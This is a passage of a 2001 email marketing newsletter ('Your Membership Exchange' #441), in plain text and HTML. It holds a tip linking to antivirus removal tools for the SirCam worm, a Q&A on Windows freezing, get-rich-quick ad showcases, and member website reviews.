 Another Trojan Fix Tool
 http://www.sarc.com/avcenter/FixSirc.com
 The fix tool will run from your desktop and will "automatically" 
 rid your computer from the SirCam Trojan and clean up an 
 entries from your registry files.
 After running either fix tool -- reboot your system.
 Hope this helps!
 Richard
 homeaffiliate@mail.com
 &gt;&gt;&gt;&gt;&gt;&gt; QUESTIONS &amp; ANSWERS &lt;&lt;&lt;&lt;&lt;&lt;
 Submit your questions &amp; answers to MyInput@AEOpublishing.com
 ANSWERS:
 From:  WonderPaint   - support@wonderpaint.com
 Subject:  Many factors in the operating system that cause conflicts
 &gt;From:  NICETY7078@aol.com 
 &gt;Subject:  What can I do about my computer freezing? (Issue #439)
 &gt;
 &gt;My computer freezes when I use AOL and sometimes when 
 &gt;I'm just using the basic functions of Windows 98. My 
 &gt;defragmentor  keeps starting over and over and my scan 
 &gt;disk never finds anything wrong, but there has to be. 
 Dear Nicety,
 As regards your problem with Windoze freezing and locking 
 up your computer I'm afraid your "SOL" as finding a true solution.  
 There are many factors in the operating system that cause conflicts 
 resulting in a locked machine.  One major problem is that many 
 programs don't release memory when you exit.  When working 
 in Windoze I've always taken the approach of rebooting on a 
 regular basis before I've had problems, especially if I've opened 
 and closed several different applications.
 Back in August 1999 John Kirch, a Microsoft Certified Professional,
 wrote an extensive article discussing the merits of a *nix operating
 system vs Windows NT.  You can read it at 
 http://www.unix-vs-nt.org/kirch/.  What was true back then is 
 even truer today.  Every current "worm" you are hearing about 
 on the news lately occurs in Windoze operating systems. 
  So, IMHO, the solution to your machine locking-up is to change 
 the OS.  Running Linux, my machine has been up for periods of 
 weeks at a time with no need to reboot.  In over a year of running 
 I can count the lock-ups on one hand and have fingers left over. 
 I have more software installed than I ever had in Windoze ... and 
 the price is right -- free.
 Jim Shofstall
 webmaster@wonderpaint.com
 http://www.wonderpaint.com
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; WEBSITE SHOWCASES &lt;&lt;&lt;&lt;&lt;&lt;
 Examine carefully - those with email addresses included WILL
 trade links with you, you are encouraged to contact them. And,
 there are many ways to build a successful business. Just look at
 these successful sites/programs other members are involved in...
 -------------------------------------------------
 Stop! - Find Out If You Qualify... 
 to Make $339-$527 A Week On-line or Off-line... 
 At Home On Your Computer. 
 mailto:wealthsolo@infogeneratorpro.com
 Free helpful file reveals Qualifications.
 -------------------------------------------------
 "It's The Most D-A-N-G-E-R-O-U-S Book on the Net" 
 Email 20,000 Targeted Leads Every Single Day! Slash Your 
 Time Online to just 1-2 Hours Daily! Build 11 Monthly 
 Income Streams Promoting ONE URL! Start building 
 YOUR Business - NOT everyone elses! 
 http://www.roibot.com/w.cgi?R8901_bd_shwc 
 -------------------------------------------------
 Start making money online right now Guaranteed! Look at 
 what you get for only $24.95:  (100% money back guarantee)
  - Our exclusive money making internet marketing kit.
  - Your own cash creating website ready to make money now.
  - Live support ready to set up your website right now.
 Check it out at http://by.advertising.com/1/c/22555/26593/81371/81371
 -------------------------------------------------
 Attention All Web Marketers-$30k-$100k CASH This Year
 No experience needed, No product to sell. 
 The real go getters can make $100,000.00 CASH,in their first month
 This is very powerful, contact me TODAY ycon@home.com 
 or goto: http://www.makecashonline.com  GET EXCITED :)
 Trade Links - mailto:ycon@home.com
 -------------------------------------------------
 If you have a product, service, opportunity and/or quality
 merchandise that appeals to people worldwide, reach your
 target audience!
 For a fraction of what other large newsletters charge you
 can exhibit your website here for only $8 CPM. Why?...
 Because as a valuable member we want you to be successful!
 Order today - Exhibits are limited and published on a
 first come, first serve basis. http://bannersgomlm.com/ezine
 ______________________________________________________
 &gt;&gt;&gt;&gt;&gt;&gt; MEMBER *REVIEWS* &lt;&lt;&lt;&lt;&lt;&lt;
 Visit these sites, look for what you like and any suggestions
 you can offer, and send your critique to MyInput
 And, after reviewing three sites, your web site will be added to
 the list! It's fun, easy, and it's a great opportunity to give
 some help and receive an informative review of your own site.
 Plus, you can also win a chance to have y our site chosen for
 a free website redesign. One randomly drawn winner each month!
 SITES TO REVIEW:
 Site #141:  http://www.floridarental.co.uk
 Carol Hall
 carol@floridarental.co.uk
 Site #142:  http://www.sharesmiles.com
 James Garrison
 webmaster@sharesmiles.com
 Site #143:  http://www.selltheworldonline.com/default2.asp?ref=1282
 gofreet@yahoo.com.au
 Site #144:  http://www.tpcenterprises.com/
 info@tpcenterprises.com
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 SITE  REVIEWED!
 Comments on Site #140:  http://www.prosperouswomen.bizland.com/masterminding
 Margarete
 MDegaston@aol.com
 ~~~~
 I really love clean, uncluttered, easy to read and navigate 
 sites like these two. They are both very attractive and well 
 presented.  In my opinion, the book site could have been 
 a little softer, or with similar characteristics to the next site, 
 preparing me for the site that it links to, and having a 
 relationship to it.
 What I did feel most, was that I was expecting something 
 related to the url  "prosperouswomen" to come up, as this 
 "word" was what caught my attention and caused me to 
 click in the first place.
 I feel the book page should be a tool for the "PW" page and 
 not a preface to it.  The main site should be the PW and the 
 book site could be a link or a popup or an additional page.
 (You need to take e out of changing on the book page.)
 With these:
 Find out how you can receive the free book.
 Email us at directions4U@aol.com        
 and
 For this and a number of other free books on networkmarketing 
 write to us at directions4U@aol.com
 I would have liked these to be clickable links, rather than 
 copy and paste.
 Very nice job on the sites, Margarete ... I really liked them. 
 (and I have ordered the book!)
 ~~~~
 I waited over 70 seconds and had yet to see the first page.  
 Could not determine if this was related to volume of graphics 
 or where we were headed.
 ~~~~
 Very clear, focused site with one page promoting a free book.
 Don't underline text unless it's a link, or somehow distinguish 
 between the links and that which is not.
 I finally figured out the logo for properouswomen was also 
 linked so I checked that out also. I think you need to make that 
 link more noticeable, and also link to your bizland site.
 If you used a form for ordering the book instead of sending a 
 request message to an aol email address you would get more 
 requests, and also might be able to automate this process.
 ~~~~
 I loved this site because it was clear, simple and to the point.
 It also peaked my curiosity and I followed the link supplied.  
 If only other sites we so simplistic!
 ~~~~
 With the masterminding site, the first sentence 'Major Impact 
 on Your Life' is incomplete. There were also run-on sentences 
 in the copy, even though the copy is quite effective. The box 
 with "Life Changeing Insight" needs the 'e' taken out of 
 'changeing', and it looked like the text could have been extended 
 to go from side to side. In the first paragraph  '... an amazing 100 
 year old text...' felt like it should be 'book' or 'secret' instead of 
 using the word 'text'.  Also it would add credibility to say where 
 or how or by whom it was discovered.
 The message is clear, the site design simple. Two things that 
 would make the site more effective (on getting people to request 
 the book) would be to say if this is an ebook, how long it is, in 
 what format it is, etc. and then also using a form for people to 
 order instead of emailing. You should be able to pick up a form 
 for this just about anywhere.
 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 ______________________________________________________
 moderator: Amy Mossel:  Moderator@AEOpublishing.com
 posting:  MyInput@AEOpublishing.com
 ______________________________________________________
 Send posts and questions (or your answers) to:
    mailto:MyInput@AEOpublishing.com
 Please send suggestions and comments to:
    mailto:Moderator@AEOpublishing.com
 To change your subscribed address, send both new
 and old address to mailto:Moderator@AEOpublishing.com
 See below for unsubscribe instructions.
 Copyright 2001 AEOpublishing
 ----- End of Your Membership Exchange
 ------------------------------------------------
 ------------------------------------------------
 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.6vihnja6&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 --90840724.996748272348.JavaMail.RovAdmin.rovweb003
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Exchange, #441&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.6vihnja6&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
             &lt;img src="" border="0" vspace="2" alt=""&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="575"&gt;
 &lt;tr&gt;
 	&lt;td width="25"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/gray-corner-tl.gif" width="25" height="25" border="0" alt=""&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- Begin Title Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="5" color="#870000"&gt;Your Membership Exchange, Issue #441&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Title Row --&gt;
 &lt;!-- Begin Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#CCCCCC" align="right"&gt;&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;August 2, 2001&lt;/font&gt;&lt;/td&gt;
 	&lt;td width="25" bgcolor="#666666"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- End Date String Row --&gt;
 &lt;tr&gt;
 	&lt;td width="575" colspan="3" height="1" bgcolor="#666666"&gt;&lt;img src="http://ccprod.roving.com/roving/images/letters/spacer.gif" width="1" height="1" border="0" alt=""&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td width="25" bgcolor="#870000"&gt;&lt;/td&gt;
 	&lt;td width="525" bgcolor="#FFFFFF"&gt;
 	&lt;!-- Begin Content Table --&gt;
 	&lt;table border="0" cellpadding="6" cellspacing="0" width="100%"&gt;
 	&lt;tr&gt;
 		&lt;td width="100%"&gt;
 		&lt;font face="Verdana,Geneva,Arial,Helvetica,sans-serif" size="2" color="#000000"&gt;
 		&lt;!-- Begin Greeting --&gt;
 		Your place to exchange ideas, ask questions, swap links, and share your skills!
 		&lt;!-- End Greeting --&gt;
 		&lt;!-- Begin Letter Body --&gt;
 		&lt;p&gt;______________________________________________________
 &lt;br&gt;You are a member in at least one of these programs
 &lt;br&gt;- You should be in them all!
 &lt;br&gt;&lt;a href="http://www.BannersGoMLM.com"&gt;BannersGoMLM.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt;ProfitBanners.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt;CashPromotions.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt;MySiteInc.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt;TimsHomeTownStories.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt;FreeLinksNetwork.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt;MyShoppingPlace.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt;BannerCo-op.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt;PutPEEL.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt;PutPEEL.net&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt;SELLinternetACCESS.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt;Be-Your-Own-ISP.com&lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt;SeventhPower.com&lt;/a&gt;
 &lt;br&gt;______________________________________________________&lt;br&gt;
 &lt;br&gt;Today's Special Announcement:
 &lt;p&gt;Right now, this week only - We have left over inventory, it's
 &lt;br&gt;unsold, but not for long.&amp;nbsp; If you could use 1 million banner
 &lt;br&gt;ads all targeted and dirt cheap go here today. This package
 &lt;br&gt;is guaranteed!! It's tough to fail when you can show your ad
 &lt;br&gt;to 1,000 people for less than a buck! A free custom banner
 &lt;br&gt;will be made for you with this deal!
 &lt;br&gt;&lt;a href="http://BannersGoMLM.com/promo/million-nl.html"&gt;http://BannersGoMLM.com/promo/million-nl.html&lt;/a&gt;
 &lt;br&gt;______________________________________________________
 		&lt;p&gt;&lt;p&gt;&gt;&gt; Ideas, Tips, &amp;amp; Information
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; R. DeLong:
 More on the SirCam virus
 &lt;p&gt;&gt;&gt; Q &amp;amp; A
 &lt;br&gt;&amp;nbsp;&amp;nbsp; ANSWERS:
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - What can I do about my computer freezing?
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; J. Shofstall:
 Many factors in the operating system that cause conflicts
 &lt;p&gt;&gt;&gt; MEMBER SHOWCASES
 &lt;p&gt;&gt;&gt; MEMBER *REVIEWS*
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Sites to Review: #141, #142, #143&amp;nbsp;
 &amp;amp; #144!
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; - Site #140 Reviewed!
 &lt;p&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; Ideas, Tips, &amp;amp; Information &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;
 &lt;p&gt;&lt;i&gt;Do you have a special software program you find helpful, or&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;even absolutely necessary? A neat tip that makes your online&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;life a little easier? Share it and help other members save time,&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;frustration, and a few steps in the learning curve. Submit&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;your ideas, tips and information to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;/i&gt;
 &lt;p&gt;From:&amp;nbsp; Richard DeLong&amp;nbsp;&amp;nbsp; - homeaffiliate@mail.com
 &lt;br&gt;Subject:&amp;nbsp; More on the SirCam virus
 &lt;p&gt;In Exchange Issue #440, JT wrote...
 &lt;p&gt;&gt;It's called the SirCam virus, and when it spreads, it sends
 &lt;br&gt;&gt;an apparently random file from the harddrives of infected
 &lt;br&gt;&gt;computers along with it. ANY file on your machine could
 &lt;br&gt;&gt;be copied and sent to hundreds of other users.
 &lt;p&gt;I also have received both the virus and email on how to get
 &lt;br&gt;rid of it.&amp;nbsp; Luckily I don't open ANY attachments, unless I'm
 &lt;br&gt;expecting them and then am still very careful.
 &lt;p&gt;Here's the ways I was told to get rid of the thing:
 &lt;p&gt;One Fix Tool:
 &lt;p&gt;Download fix_sircam.com and run the file. It will scan Drive
 &lt;br&gt;C:\ and subfolders and runs in DOS.
 &lt;br&gt;&lt;a href="http://www.antivirus.com/vinfo/security/fix_sircam.com"&gt;http://www.antivirus.com/vinfo/security/fix_sircam.com&lt;/a&gt;
 &lt;p&gt;Another Trojan Fix Tool
 &lt;br&gt;&lt;a href="http://www.sarc.com/avcenter/FixSirc.com"&gt;http://www.sarc.com/avcenter/FixSirc.com&lt;/a&gt;
 &lt;br&gt;The fix tool will run from your desktop and will "automatically"
 &lt;br&gt;rid your computer from the SirCam Trojan and clean up an
 &lt;br&gt;entries from your registry files.
 &lt;p&gt;After running either fix tool -- reboot your system.
 &lt;p&gt;Hope this helps!
 &lt;p&gt;Richard
 &lt;br&gt;homeaffiliate@mail.com
 &lt;br&gt;&amp;nbsp;
 &lt;br&gt;&amp;nbsp;
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;QUESTIONS &amp;amp; ANSWERS&lt;/b&gt; &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;
 &lt;br&gt;&lt;i&gt;Submit your questions &amp;amp; answers to &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;&lt;/i&gt;
 &lt;p&gt;&lt;b&gt;ANSWERS:&lt;/b&gt;
 &lt;p&gt;From:&amp;nbsp; WonderPaint&amp;nbsp;&amp;nbsp; - support@wonderpaint.com
 &lt;br&gt;Subject:&amp;nbsp; Many factors in the operating system that cause conflicts
 &lt;p&gt;&gt;From:&amp;nbsp; NICETY7078@aol.com
 &lt;br&gt;&gt;Subject:&amp;nbsp; What can I do about my computer freezing? (Issue #439)
 &lt;br&gt;&gt;
 &lt;br&gt;&gt;My computer freezes when I use AOL and sometimes when
 &lt;br&gt;&gt;I'm just using the basic functions of Windows 98. My
 &lt;br&gt;&gt;defragmentor&amp;nbsp; keeps starting over and over and my scan
 &lt;br&gt;&gt;disk never finds anything wrong, but there has to be.
 &lt;p&gt;Dear Nicety,
 &lt;p&gt;As regards your problem with Windoze freezing and locking
 &lt;br&gt;up your computer I'm afraid your "SOL" as finding a true solution.
 &lt;br&gt;There are many factors in the operating system that cause conflicts
 &lt;br&gt;resulting in a locked machine.&amp;nbsp; One major problem is that many
 &lt;br&gt;programs don't release memory when you exit.&amp;nbsp; When working
 &lt;br&gt;in Windoze I've always taken the approach of rebooting on a
 &lt;br&gt;regular basis before I've had problems, especially if I've opened
 &lt;br&gt;and closed several different applications.
 &lt;p&gt;Back in August 1999 John Kirch, a Microsoft Certified Professional,
 &lt;br&gt;wrote an extensive article discussing the merits of a *nix operating
 &lt;br&gt;system vs Windows NT.&amp;nbsp; You can read it at
 &lt;br&gt;&lt;a href="http://www.unix-vs-nt.org/kirch/"&gt;http://www.unix-vs-nt.org/kirch/&lt;/a&gt;.&amp;nbsp;
 What was true back then is
 &lt;br&gt;even truer today.&amp;nbsp; Every current "worm" you are hearing about
 &lt;br&gt;on the news lately occurs in Windoze operating systems.
 &lt;p&gt;&amp;nbsp;So, IMHO, the solution to your machine locking-up is to change
 &lt;br&gt;the OS.&amp;nbsp; Running Linux, my machine has been up for periods of
 &lt;br&gt;weeks at a time with no need to reboot.&amp;nbsp; In over a year of running
 &lt;br&gt;I can count the lock-ups on one hand and have fingers left over.
 &lt;br&gt;I have more software installed than I ever had in Windoze ... and
 &lt;br&gt;the price is right -- free.
 &lt;p&gt;Jim Shofstall
 &lt;br&gt;webmaster@wonderpaint.com
 &lt;br&gt;&lt;a href="http://www.wonderpaint.com"&gt;http://www.wonderpaint.com&lt;/a&gt;
 		&lt;p&gt;&lt;p&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;WEBSITE SHOWCASES&lt;/b&gt; &lt;&lt;&lt;&lt;&lt;&lt;
 &lt;p&gt;&lt;i&gt;Examine carefully - those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;trade links with you, you are encouraged to contact them. And,&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;there are many ways to build a successful business. Just look at&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;these successful sites/programs other members are involved in..&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Stop! - Find Out If You Qualify...
 &lt;br&gt;to Make $339-$527 A Week On-line or Off-line...
 &lt;br&gt;At Home On Your Computer.
 &lt;br&gt;&lt;a href="mailto:wealthsolo@infogeneratorpro.com"&gt;mailto:wealthsolo@infogeneratorpro.com&lt;/a&gt;
 &lt;br&gt;Free helpful file reveals Qualifications.
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;"It's The Most D-A-N-G-E-R-O-U-S Book on the Net"
 &lt;br&gt;Email 20,000 Targeted Leads Every Single Day! Slash Your
 &lt;br&gt;Time Online to just 1-2 Hours Daily! Build 11 Monthly
 &lt;br&gt;Income Streams Promoting ONE URL! Start building
 &lt;br&gt;YOUR Business - NOT everyone elses!
 &lt;br&gt;&lt;a href="http://www.roibot.com/w.cgi?R8901_bd_shwc"&gt;http://www.roibot.com/w.cgi?R8901_bd_shwc&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Start making money online right now Guaranteed! Look at
 &lt;br&gt;what you get for only $24.95:&amp;nbsp; (100% money back guarantee)
 &lt;br&gt;&amp;nbsp;- Our exclusive money making internet marketing kit.
 &lt;br&gt;&amp;nbsp;- Your own cash creating website ready to make money now.
 &lt;br&gt;&amp;nbsp;- Live support ready to set up your website right now.
 &lt;br&gt;Check it out at &lt;a href="http://by.advertising.com/1/c/22555/26593/81371/81371"&gt;http://by.advertising.com/1/c/22555/26593/81371/81371&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Attention All Web Marketers-$30k-$100k CASH This Year
 &lt;br&gt;No experience needed, No product to sell.
 &lt;br&gt;The real go getters can make $100,000.00 CASH,in their first month
 &lt;br&gt;This is very powerful, contact me TODAY ycon@home.com
 &lt;br&gt;or goto: &lt;a href="http://www.makecashonline.com"&gt;http://www.makecashonline.com&lt;/a&gt;&amp;nbsp;
 GET EXCITED :)
 &lt;br&gt;Trade Links - &lt;a href="mailto:ycon@home.com"&gt;mailto:ycon@home.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity and/or quality&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;merchandise that appeals to people worldwide, reach your&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;target audience!&lt;/i&gt;
 &lt;p&gt;&lt;i&gt;For a fraction of what other large newsletters charge you&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;can exhibit your website here for only $8 CPM. Why?...&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Because as a valuable member we want you to be successful!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Order today - Exhibits are limited and published on a&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;first come, first serve basis. &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;&lt;/i&gt;
 &lt;br&gt;
 		&lt;p&gt;&lt;br&gt;______________________________________________________
 &lt;p&gt;&gt;&gt;&gt;&gt;&gt;&gt; &lt;b&gt;MEMBER *REVIEWS*&lt;/b&gt; &amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;&amp;lt;
 &lt;p&gt;Visit these sites, look for what you like and any suggestions
 &lt;br&gt;you can offer, and send your critique to MyInput
 &lt;br&gt;And, after reviewing three sites, your web site will be added to
 &lt;br&gt;the list! It's fun, easy, and it's a great opportunity to give
 &lt;br&gt;some help and receive an informative review of your own site.
 &lt;br&gt;Plus, you can also win a chance to have y our site chosen for
 &lt;br&gt;a free website redesign. One randomly drawn winner each month!
 &lt;br&gt;&amp;nbsp;
 &lt;p&gt;&lt;b&gt;SITES TO REVIEW:&lt;/b&gt;
 &lt;p&gt;Site #141:&amp;nbsp; &lt;a href="http://www.floridarental.co.uk"&gt;http://www.floridarental.co.uk&lt;/a&gt;
 &lt;br&gt;Carol Hall
 &lt;br&gt;carol@floridarental.co.uk
 &lt;p&gt;Site #142:&amp;nbsp; &lt;a href="http://www.sharesmiles.com"&gt;http://www.sharesmiles.com&lt;/a&gt;
 &lt;br&gt;James Garrison
 &lt;br&gt;webmaster@sharesmiles.com
 &lt;p&gt;Site #143:&amp;nbsp; &lt;a href="http://www.selltheworldonline.com/default2.asp?ref=1282"&gt;http://www.selltheworldonline.com/default2.asp?ref=1282&lt;/a&gt;
 &lt;br&gt;gofreet@yahoo.com.au
 &lt;p&gt;Site #144:&amp;nbsp; &lt;a href="http://www.tpcenterprises.com/"&gt;http://www.tpcenterprises.com/&lt;/a&gt;
 &lt;br&gt;info@tpcenterprises.com
 &lt;p&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;p&gt;&lt;b&gt;SITE&amp;nbsp; REVIEWED!&lt;/b&gt;
 &lt;p&gt;Comments on Site #140:&amp;nbsp; &lt;a href="http://www.prosperouswomen.bizland.com/masterminding"&gt;http://www.prosperouswomen.bizland.com/masterminding&lt;/a&gt;
 &lt;br&gt;Margarete
 &lt;br&gt;MDegaston@aol.com
 &lt;br&gt;~~~~
 &lt;p&gt;I really love clean, uncluttered, easy to read and navigate
 &lt;br&gt;sites like these two. They are both very attractive and well
 &lt;br&gt;presented.&amp;nbsp; In my opinion, the book site could have been
 &lt;br&gt;a little softer, or with similar characteristics to the next site,
 &lt;br&gt;preparing me for the site that it links to, and having a
 &lt;br&gt;relationship to it.
 &lt;p&gt;What I did feel most, was that I was expecting something
 &lt;br&gt;related to the url&amp;nbsp; "prosperouswomen" to come up, as this
 &lt;br&gt;"word" was what caught my attention and caused me to
 &lt;br&gt;click in the first place.
 &lt;p&gt;I feel the book page should be a tool for the "PW" page and
 &lt;br&gt;not a preface to it.&amp;nbsp; The main site should be the PW and the
 &lt;br&gt;book site could be a link or a popup or an additional page.
 &lt;br&gt;(You need to take e out of changing on the book page.)
 &lt;p&gt;With these:
 &lt;p&gt;Find out how you can receive the free book.
 &lt;br&gt;Email us at directions4U@aol.com
 &lt;br&gt;and
 &lt;br&gt;For this and a number of other free books on networkmarketing
 &lt;br&gt;write to us at directions4U@aol.com
 &lt;p&gt;I would have liked these to be clickable links, rather than
 &lt;br&gt;copy and paste.
 &lt;p&gt;Very nice job on the sites, Margarete ... I really liked them.
 &lt;br&gt;(and I have ordered the book!)
 &lt;br&gt;~~~~
 &lt;p&gt;I waited over 70 seconds and had yet to see the first page.
 &lt;br&gt;Could not determine if this was related to volume of graphics
 &lt;br&gt;or where we were headed.
 &lt;br&gt;~~~~
 &lt;p&gt;Very clear, focused site with one page promoting a free book.
 &lt;p&gt;Don't underline text unless it's a link, or somehow distinguish
 &lt;br&gt;between the links and that which is not.
 &lt;p&gt;I finally figured out the logo for properouswomen was also
 &lt;br&gt;linked so I checked that out also. I think you need to make that
 &lt;br&gt;link more noticeable, and also link to your bizland site.
 &lt;p&gt;If you used a form for ordering the book instead of sending a
 &lt;br&gt;request message to an aol email address you would get more
 &lt;br&gt;requests, and also might be able to automate this process.
 &lt;br&gt;~~~~
 &lt;p&gt;I loved this site because it was clear, simple and to the point.
 &lt;br&gt;It also peaked my curiosity and I followed the link supplied.
 &lt;br&gt;If only other sites we so simplistic!
 &lt;br&gt;~~~~
 &lt;p&gt;With the masterminding site, the first sentence 'Major Impact
 &lt;br&gt;on Your Life' is incomplete. There were also run-on sentences
 &lt;br&gt;in the copy, even though the copy is quite effective. The box
 &lt;br&gt;with "Life Changeing Insight" needs the 'e' taken out of
 &lt;br&gt;'changeing', and it looked like the text could have been extended
 &lt;br&gt;to go from side to side. In the first paragraph&amp;nbsp; '... an amazing
 100
 &lt;br&gt;year old text...' felt like it should be 'book' or 'secret' instead
 of
 &lt;br&gt;using the word 'text'.&amp;nbsp; Also it would add credibility to say where
 &lt;br&gt;or how or by whom it was discovered.
 &lt;p&gt;The message is clear, the site design simple. Two things that
 &lt;br&gt;would make the site more effective (on getting people to request
 &lt;br&gt;the book) would be to say if this is an ebook, how long it is, in
 &lt;br&gt;what format it is, etc. and then also using a form for people to
 &lt;br&gt;order instead of emailing. You should be able to pick up a form
 &lt;br&gt;for this just about anywhere.
 &lt;br&gt;~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 &lt;br&gt;______________________________________________________
 		&lt;p&gt;&lt;br&gt;moderator: Amy Mossel&amp;nbsp; &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator&lt;/a&gt;
 &lt;br&gt;posting:&amp;nbsp;&amp;nbsp; &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;______________________________________________________
 &lt;p&gt;Send posts and questions (or your answers) to:
 &lt;br&gt;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:MyInput@AEOpublishing.com"&gt;MyInput@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;Please send suggestions and comments to:
 &lt;br&gt;&amp;nbsp;&amp;nbsp; &lt;a href="mailto:Moderator@AEOpublishing.com"&gt;Moderator@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To change your subscribed address, send both new
